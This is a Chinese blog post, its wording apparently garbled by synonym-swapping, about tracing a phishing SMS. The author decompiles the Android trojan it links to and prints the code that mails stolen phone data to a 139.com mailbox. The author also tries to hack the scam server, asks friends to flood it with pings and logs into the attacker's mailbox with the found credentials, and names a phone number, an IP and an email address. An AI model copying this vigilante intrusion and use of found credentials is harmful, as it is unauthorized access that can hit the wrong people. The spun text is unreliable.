今天原来是挺忙的，表情也还不错，快到周末了嘛！可是下面这条短信却让俺生气了：

您说，俺一个热爱祖国热爱人民的有志青年，怎么就被人黑成这样呢，越想越来气，要在平时这种事是不爱管的，今天不行了，必需把这个王八蛋揪出来，@张家小伙 怎么说来着？必需往死里整。
于是，俺先象征性的给这个电话15112014684打过去，电话属广东广州移动通信，功效提示：正在通话中，预计是这货设置了不接来电，也许就是一废卡，或者某个短信群发器的号吧，不管了，先从网址入手。
先看这个网址ｗｗｗ．ｉｐｎｐｓ．ｃｏｍ， 在电脑上用最简单的CMD命令行PING一下，IP显示为：118.193.208.78，通过IP盘问，知道这个主机位置在香港出格行政区，然后浏览器输入IP地点，显示一个MSSQL数据库打点界面，黑了几下没告成，用的IIS+ASP.NET+防DDOS，安适系数对照高，算了！
在电脑上打开这个网址，记住：千万别在手机短信或者聊天软件上打开不明来源的网址，八成是一个木马APP。下载了一个240KB没后缀名的文件，就它了，改后缀为图片、视频、网页什么的都打不开，一堆乱码，索性先弄个PING忽悠一下他处事器，于是发了微信叫圈儿里的伴侣们资助黑它，胖子哥们儿说Ping欠亨，有人问怎么弄……

到这里，华盟君去食堂用饭了，想了一路，给@翼网天狼 这技术哥打了个电话，他说你用解压缩解一解尝尝，我一拍脑袋——对呀，怎么就把这给忘了！

急仓皇回来，啃了一个火龙果开干，后缀名改成rar或ZIP或7Z或TAZ等等，都被360安适卫士报毒，可想而知，这就是一个病毒啊！！
但是很奇怪，没有后缀名时，360为啥不报毒，难道让我在电脑里养着？？
爽性也不乱后缀名了，直接拿360解压缩，功效就出来了，是一个安卓的APP措施，已经封包了，不妨，俺把它给破了。

筹备三样工具：
1、apktool反编译工具；
2、dex2jar-0.0.9.15析出JAVA代码；
3、jd-gui-0.3.5.windows检察源代码。
凭据法式来，以下是截图：

到这里，俺@华盟君 就算告成90%了，为啥哩，有了源代码就知道这个APP木马到底干的啥活动了。
哥们儿，姐们儿们，您看到这里是不是累了，别感受跟本身不妨，接着往下看，看不懂就先凑个热闹吧！
在源码布局里，一般都把恶劣的病毒措施放在swx里，好了，我不是个JAVA措施猿，但也学过几天不是，没翻半分钟，这厮的马脚就露出来了，在ti.isq.swx排列下的a.class文件中，我们发明了下面这段代码：

public static int a(String paramString1, String paramString2, String paramString3)
{
if (a)
return 1;
i locali = new i("1341643****@139.com", "qq123****");
locali.c("smtp.139.com");
locali.b("25");
locali.a(true);
locali.a(new String[] { paramString1 });
locali.a("13416437901@139.com");
locali.d(paramString2);
locali.e(paramString3);
一看就是139邮箱的，这里实现的成果是把从手机里窃取的信息发到这个邮箱，好了，用用户名和暗码登陆：mail.139.com
然后，老窝就被端出来了！！看下面几张图：
【1】进入他的邮件：